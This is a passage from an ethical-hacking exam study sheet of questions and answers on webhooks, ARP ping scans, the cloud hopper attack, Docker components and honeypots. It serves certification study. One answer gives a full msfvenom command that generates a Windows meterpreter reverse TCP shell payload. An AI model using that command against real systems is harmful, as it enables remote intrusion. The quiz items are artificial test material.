Ethical Hacker | Questions and Answers | Grade A|
100% Correct (Verified Answers)
Question:
Susan, a software developer, wants her web API to update other applications with the latest
information. For this purpose, she uses a user-defined HTTP tailback or push APIs that are raised
based on trigger events: when invoked, this feature supplies data to other applications so that
users can instantly receive real-time Information.Which of the following techniques is employed
by Susan?
Answer:
Webhooks
Question:
Andrew is an Ethical Hacker who was assigned the task of discovering all the active devices
hidden by a restrictive firewall in the IPv4 range in a given target network.Which of the
following host discovery techniques must he use to perform the given task?
Answer:
arp ping scan
Question:
Alice, a professional hacker, targeted an organization's cloud services. She infiltrated the targets
MSP provider by sending spear-phishing emails and distributed custom-made malware to
compromise user accounts and gain remote access to the cloud service. Further, she accessed the
target customer profiles with her MSP account, compressed the customer data, and stored them
in the MSP. Then, she used this information to launch further attacks on the target organization.
Which of the following cloud attacks did Alice perform in the above scenario?
Answer:
Cloud hopper attack
, Question:
Annie, a cloud security engineer, uses the Docker architecture to employ a client/server model in
the application she is working on. She utilizes a component that can process API requests and
handle various Docker objects, such as containers, volumes. Images, and networks. What is the
component of the Docker architecture used by Annie in the above scenario?
Answer:
Docker daemon
Question:
what is the correct way of using MSFvenom to generate a reverse TCP shellcode for windows?
Answer:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.30 LPORT=4444 -f exe >
shell.exe
Question:
which of the following information security controls creates an appealing isolated environment
for hackers to prevent them from compromising critical targets while simultaneously gathering
information about the hacker?
Answer:
Honeypot
Question:
infecting a system with malware and using phishing to gain credentials to a system or web
application are examples of which phase of the ethical hacking methodology?
Answer: